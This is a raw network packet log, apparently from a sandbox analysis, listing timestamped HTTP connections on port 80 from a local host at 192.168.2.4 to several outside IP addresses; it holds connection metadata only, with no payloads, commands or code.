                                                                                                                                                                              Oct 30, 2024 08:12:00.197139025 CET5002980192.168.2.4172.67.154.67
                                                                                                                                                                              Oct 30, 2024 08:12:00.202788115 CET8050029172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:00.880208015 CET8050029172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:00.880224943 CET8050029172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:00.880361080 CET5002980192.168.2.4172.67.154.67
                                                                                                                                                                              Oct 30, 2024 08:12:00.882469893 CET8050029172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:00.882534027 CET5002980192.168.2.4172.67.154.67
                                                                                                                                                                              Oct 30, 2024 08:12:01.705961943 CET5002980192.168.2.4172.67.154.67
                                                                                                                                                                              Oct 30, 2024 08:12:02.732105017 CET5003080192.168.2.4172.67.154.67
                                                                                                                                                                              Oct 30, 2024 08:12:02.739084959 CET8050030172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:02.742080927 CET5003080192.168.2.4172.67.154.67
                                                                                                                                                                              Oct 30, 2024 08:12:02.763341904 CET5003080192.168.2.4172.67.154.67
                                                                                                                                                                              Oct 30, 2024 08:12:02.769643068 CET8050030172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:02.770138025 CET8050030172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:02.770304918 CET8050030172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:02.770315886 CET8050030172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:02.770375967 CET8050030172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:02.770385981 CET8050030172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:02.770416021 CET8050030172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:02.770833969 CET8050030172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:02.770875931 CET8050030172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:03.452763081 CET8050030172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:03.455230951 CET8050030172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:03.455281019 CET5003080192.168.2.4172.67.154.67
                                                                                                                                                                              Oct 30, 2024 08:12:04.268315077 CET5003080192.168.2.4172.67.154.67
                                                                                                                                                                              Oct 30, 2024 08:12:05.341865063 CET5003180192.168.2.4172.67.154.67
                                                                                                                                                                              Oct 30, 2024 08:12:05.347485065 CET8050031172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:05.350199938 CET5003180192.168.2.4172.67.154.67
                                                                                                                                                                              Oct 30, 2024 08:12:05.394185066 CET5003180192.168.2.4172.67.154.67
                                                                                                                                                                              Oct 30, 2024 08:12:05.399657965 CET8050031172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:06.046822071 CET8050031172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:06.046880960 CET8050031172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:06.047014952 CET5003180192.168.2.4172.67.154.67
                                                                                                                                                                              Oct 30, 2024 08:12:06.048806906 CET8050031172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:06.048863888 CET5003180192.168.2.4172.67.154.67
                                                                                                                                                                              Oct 30, 2024 08:12:06.052263021 CET5003180192.168.2.4172.67.154.67
                                                                                                                                                                              Oct 30, 2024 08:12:06.058516979 CET8050031172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:14.230556011 CET5003280192.168.2.420.2.249.7
                                                                                                                                                                              Oct 30, 2024 08:12:14.236062050 CET805003220.2.249.7192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:14.236186981 CET5003280192.168.2.420.2.249.7
                                                                                                                                                                              Oct 30, 2024 08:12:14.255358934 CET5003280192.168.2.420.2.249.7
                                                                                                                                                                              Oct 30, 2024 08:12:14.260895967 CET805003220.2.249.7192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:15.186750889 CET805003220.2.249.7192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:15.299562931 CET5003280192.168.2.420.2.249.7
                                                                                                                                                                              Oct 30, 2024 08:12:15.365921974 CET805003220.2.249.7192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:15.366055965 CET5003280192.168.2.420.2.249.7
                                                                                                                                                                              Oct 30, 2024 08:12:15.768378019 CET5003280192.168.2.420.2.249.7
                                                                                                                                                                              Oct 30, 2024 08:12:16.790132999 CET5003380192.168.2.420.2.249.7
                                                                                                                                                                              Oct 30, 2024 08:12:16.795689106 CET805003320.2.249.7192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:16.795948982 CET5003380192.168.2.420.2.249.7
                                                                                                                                                                              Oct 30, 2024 08:12:16.808760881 CET5003380192.168.2.420.2.249.7
                                                                                                                                                                              Oct 30, 2024 08:12:16.814178944 CET805003320.2.249.7192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:17.752625942 CET805003320.2.249.7192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:17.871433020 CET5003380192.168.2.420.2.249.7
                                                                                                                                                                              Oct 30, 2024 08:12:17.935267925 CET805003320.2.249.7192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:17.935338974 CET5003380192.168.2.420.2.249.7
                                                                                                                                                                              Oct 30, 2024 08:12:18.315256119 CET5003380192.168.2.420.2.249.7
                                                                                                                                                                              Oct 30, 2024 08:12:19.338522911 CET5003480192.168.2.420.2.249.7
                                                                                                                                                                              Oct 30, 2024 08:12:19.343946934 CET805003420.2.249.7192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:19.346415043 CET5003480192.168.2.420.2.249.7
                                                                                                                                                                              Oct 30, 2024 08:12:19.359023094 CET5003480192.168.2.420.2.249.7
                                                                                                                                                                              Oct 30, 2024 08:12:19.364396095 CET805003420.2.249.7192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:19.364548922 CET805003420.2.249.7192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:19.364579916 CET805003420.2.249.7192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:19.364630938 CET805003420.2.249.7192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:19.364659071 CET805003420.2.249.7192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:19.364689112 CET805003420.2.249.7192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:19.364717007 CET805003420.2.249.7192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:19.364743948 CET805003420.2.249.7192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:19.364772081 CET805003420.2.249.7192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:20.298212051 CET805003420.2.249.7192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:20.485106945 CET805003420.2.249.7192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:20.486990929 CET5003480192.168.2.420.2.249.7
                                                                                                                                                                              Oct 30, 2024 08:12:20.862200975 CET5003480192.168.2.420.2.249.7
                                                                                                                                                                              Oct 30, 2024 08:12:21.881849051 CET5003580192.168.2.420.2.249.7
                                                                                                                                                                              Oct 30, 2024 08:12:21.888247967 CET805003520.2.249.7192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:21.888334036 CET5003580192.168.2.420.2.249.7
                                                                                                                                                                              Oct 30, 2024 08:12:21.897102118 CET5003580192.168.2.420.2.249.7
                                                                                                                                                                              Oct 30, 2024 08:12:21.903119087 CET805003520.2.249.7192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:22.831274033 CET805003520.2.249.7192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:22.879079103 CET5003580192.168.2.420.2.249.7
                                                                                                                                                                              Oct 30, 2024 08:12:23.003634930 CET805003520.2.249.7192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:23.008055925 CET5003580192.168.2.420.2.249.7
                                                                                                                                                                              Oct 30, 2024 08:12:23.030388117 CET5003580192.168.2.420.2.249.7
                                                                                                                                                                              Oct 30, 2024 08:12:23.035698891 CET805003520.2.249.7192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:29.584120989 CET5003680192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 30, 2024 08:12:29.589574099 CET8050036203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:29.589674950 CET5003680192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 30, 2024 08:12:29.604518890 CET5003680192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 30, 2024 08:12:29.610069036 CET8050036203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:30.271007061 CET8050036203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:30.309412003 CET8050036203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:30.309500933 CET5003680192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 30, 2024 08:12:31.112072945 CET5003680192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 30, 2024 08:12:32.132234097 CET5003780192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 30, 2024 08:12:32.138392925 CET8050037203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:32.138493061 CET5003780192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 30, 2024 08:12:32.151196957 CET5003780192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 30, 2024 08:12:32.157294035 CET8050037203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:32.829319000 CET8050037203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:32.867952108 CET8050037203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:32.868097067 CET5003780192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 30, 2024 08:12:33.659158945 CET5003780192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 30, 2024 08:12:34.678013086 CET5003880192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 30, 2024 08:12:34.685379028 CET8050038203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:34.685645103 CET5003880192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 30, 2024 08:12:34.700097084 CET5003880192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 30, 2024 08:12:34.705571890 CET8050038203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:34.705605984 CET8050038203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:34.705634117 CET8050038203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:34.705686092 CET8050038203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:34.705713987 CET8050038203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:34.705764055 CET8050038203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:34.705790997 CET8050038203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:34.705840111 CET8050038203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:34.705884933 CET8050038203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:35.379117012 CET8050038203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:35.417001963 CET8050038203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:35.417290926 CET5003880192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 30, 2024 08:12:36.205892086 CET5003880192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 30, 2024 08:12:37.228687048 CET5003980192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 30, 2024 08:12:37.234185934 CET8050039203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:37.234272003 CET5003980192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 30, 2024 08:12:37.241488934 CET5003980192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 30, 2024 08:12:37.246881962 CET8050039203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:37.918967009 CET8050039203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:37.957118034 CET8050039203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:37.957230091 CET5003980192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 30, 2024 08:12:37.958144903 CET5003980192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 30, 2024 08:12:37.963479042 CET8050039203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:43.165565014 CET5004080192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:43.171041965 CET8050040199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:43.171119928 CET5004080192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:43.183733940 CET5004080192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:43.189282894 CET8050040199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:43.809514999 CET8050040199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:43.809561968 CET8050040199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:43.809672117 CET8050040199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:43.809745073 CET5004080192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:44.690149069 CET5004080192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:45.712038040 CET5004180192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:45.717413902 CET8050041199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:45.719291925 CET5004180192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:45.732055902 CET5004180192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:45.737510920 CET8050041199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:46.357311010 CET8050041199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:46.357333899 CET8050041199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:46.357759953 CET5004180192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:46.357800007 CET8050041199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:46.357954979 CET5004180192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:47.239557981 CET5004180192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:48.259870052 CET5004280192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:48.265345097 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:48.265873909 CET5004280192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:48.280092001 CET5004280192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:48.285561085 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:48.285587072 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:48.285599947 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:48.285640955 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:48.285650969 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:48.285770893 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:48.285801888 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:48.285840988 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:48.285895109 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:48.894921064 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:48.894942045 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:48.895000935 CET5004280192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:48.895370960 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:48.895426035 CET5004280192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:49.786458015 CET5004280192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:50.802957058 CET5004380192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:50.808407068 CET8050043199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:50.808665037 CET5004380192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:50.816328049 CET5004380192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:50.821629047 CET8050043199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:51.442913055 CET8050043199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:51.442933083 CET8050043199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:51.443226099 CET5004380192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:51.443228006 CET8050043199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:51.443296909 CET5004380192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:51.446206093 CET5004380192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 30, 2024 08:12:51.451498985 CET8050043199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:56.721582890 CET5004480192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:12:56.727075100 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:56.727149010 CET5004480192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:12:56.739907026 CET5004480192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:12:56.745228052 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:57.609009027 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:57.609025955 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:57.609038115 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:57.609051943 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:57.609083891 CET5004480192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:12:57.609108925 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:57.609122992 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:57.609138966 CET5004480192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:12:57.609217882 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:57.609230042 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:57.609246016 CET5004480192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:12:57.610013962 CET5004480192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:12:57.749516010 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:57.749686003 CET5004480192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:12:58.252809048 CET5004480192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:12:59.272408009 CET5004580192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:12:59.277915955 CET8050045217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:59.278007030 CET5004580192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:12:59.292188883 CET5004580192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:12:59.297616005 CET8050045217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:00.169521093 CET8050045217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:00.169542074 CET8050045217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:00.169559956 CET8050045217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:00.169579983 CET8050045217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:00.169595957 CET8050045217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:00.169610023 CET8050045217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:00.169619083 CET5004580192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:13:00.169625998 CET8050045217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:00.169656038 CET5004580192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:13:00.169758081 CET8050045217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:00.169863939 CET5004580192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:13:00.309528112 CET8050045217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:00.309590101 CET5004580192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:13:00.799560070 CET5004580192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:13:01.866041899 CET5004680192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:13:01.871555090 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:01.871715069 CET5004680192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:13:01.882767916 CET5004680192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:13:01.888169050 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:01.888180971 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:01.888190031 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:01.888207912 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:01.888212919 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:01.888216972 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:01.888292074 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:01.888318062 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:01.888329029 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:02.751676083 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:02.751720905 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:02.751734018 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:02.751749039 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:02.751784086 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:02.751785040 CET5004680192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:13:02.751796007 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:02.751817942 CET5004680192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:13:02.751837969 CET5004680192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:13:02.751864910 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:02.751876116 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:02.751912117 CET5004680192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:13:02.892863989 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:02.892909050 CET5004680192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:13:03.393282890 CET5004680192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:13:04.436036110 CET5004780192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:13:04.442533970 CET8050047217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:04.442687988 CET5004780192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:13:04.452014923 CET5004780192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:13:04.458467007 CET8050047217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:05.362108946 CET8050047217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:05.362154961 CET8050047217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:05.362165928 CET8050047217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:05.362178087 CET8050047217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:05.362191916 CET8050047217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:05.362206936 CET8050047217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:05.362221003 CET8050047217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:05.362294912 CET8050047217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:05.362313032 CET5004780192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:13:05.362365007 CET5004780192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:13:05.503102064 CET8050047217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:05.504137039 CET5004780192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:13:05.504996061 CET5004780192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 30, 2024 08:13:05.510327101 CET8050047217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:10.706700087 CET5004880192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 30, 2024 08:13:10.712156057 CET8050048144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:10.716362000 CET5004880192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 30, 2024 08:13:10.728018045 CET5004880192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 30, 2024 08:13:10.733447075 CET8050048144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:11.589212894 CET8050048144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:11.643332958 CET5004880192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 30, 2024 08:13:11.729428053 CET8050048144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:11.729480028 CET5004880192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 30, 2024 08:13:12.237046003 CET5004880192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 30, 2024 08:13:13.255743027 CET5004980192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 30, 2024 08:13:13.261274099 CET8050049144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:13.262739897 CET5004980192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 30, 2024 08:13:13.274454117 CET5004980192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 30, 2024 08:13:13.279803038 CET8050049144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:14.199846983 CET8050049144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:14.252583981 CET5004980192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 30, 2024 08:13:14.260111094 CET8050049144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:14.260157108 CET5004980192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 30, 2024 08:13:14.784183025 CET5004980192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 30, 2024 08:13:15.807538986 CET5005080192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 30, 2024 08:13:15.813282013 CET8050050144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:15.813441038 CET5005080192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 30, 2024 08:13:15.826363087 CET5005080192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 30, 2024 08:13:15.831849098 CET8050050144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:15.831906080 CET8050050144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:15.831917048 CET8050050144.76.190.39192.168.2.4
